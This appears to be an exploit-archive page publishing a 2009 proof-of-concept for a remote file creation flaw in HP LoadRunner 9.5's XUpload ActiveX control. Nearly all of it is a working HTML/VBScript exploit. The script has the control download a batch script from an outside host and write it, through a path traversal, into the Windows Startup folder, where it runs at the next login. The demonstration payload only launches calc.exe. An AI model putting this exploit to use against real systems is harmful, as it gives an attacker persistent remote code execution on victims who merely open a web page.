HP LoadRunner 9.5 remote file creation PoC

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : HP LoadRunner 9.5 remote file creation PoC
# Published : 2009-09-29
# Author : Pyrokinesis
# Previous Title : XLPD 3.0 Remote DoS
# Next Title : Cerberus FTP server 3.0.6 Pre-Auth DoS

<!--
HP LoadRunner 9.5 Persits.XUpload.2 control (XUpload.ocx) MakeHttpRequest() remote file creation poc
(IE 8)
by Nine:Situations:Group::pyrokinesis

CLSID: {E87F6C8E-16C0-11D3-BEF7-009027438003}
Progid: Persits.XUpload.2
Binary Path: C:ProgrammiHPLoadRunnerbinXUpload.ocx
KillBitted: False
Implements IObjectSafety: True
Safe For Initialization (IObjectSafety): True
Safe For Scripting (IObjectSafety): True
-->
<html>
<object classid='clsid:E87F6C8E-16C0-11D3-BEF7-009027438003' id='XUPLOADLib' />
</object>
<script language='vbscript'>

' http://retrogod.altervista.org/sh_9232.txt , a batch script that starts calc.exe
XUPLOADLib.Server = "retrogod.altervista.org"
XUPLOADLib.Script = "sh_9232.txt"

' place it in the Startup folder, italian path, change for your os
Method=""
Params=""
Path="..\..\..\Documents and SettingsAll Users.WINDOWSMenu AvvioProgrammiEsecuzione automatica\sh.cmd"
UserAgent=""
Headers=""
XUPLOADLib.MakeHttpRequest Method ,Params ,Path ,UserAgent ,Headers
</script>